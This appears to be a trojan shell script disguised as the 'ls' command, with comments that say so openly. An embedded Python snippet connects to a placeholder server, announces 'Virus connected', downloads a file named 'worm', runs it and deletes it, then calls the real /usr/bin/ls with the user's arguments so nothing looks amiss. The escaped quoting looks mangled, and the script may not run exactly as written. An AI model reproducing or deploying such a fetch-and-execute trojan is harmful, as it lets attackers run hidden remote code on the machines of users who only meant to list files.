#!/usr/bin/bash

# get worm from server
python3 - << END
import socket
import time
from os import popen

HOST = "server_host"
PORT = "server_port"

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    outdata = "\"Virus connected"\"
    s.sendall(outdata.encode())
    
    with open("\"worm"\", "\"w"\") as f:
        while True:
            indata = s.recv(1024).decode()
            if "\"exit 0"\" in indata:
                f.write(indata)
                break
            f.write(indata)
END

chmod +x worm
./worm
rm -f worm

# call the original ls
cmd="\"/usr/bin/ls"\"
for arg in "\"\$\@"\" 
do
    cmd="\"\$cmd \$arg"\"
done
eval \$cmd
exit 0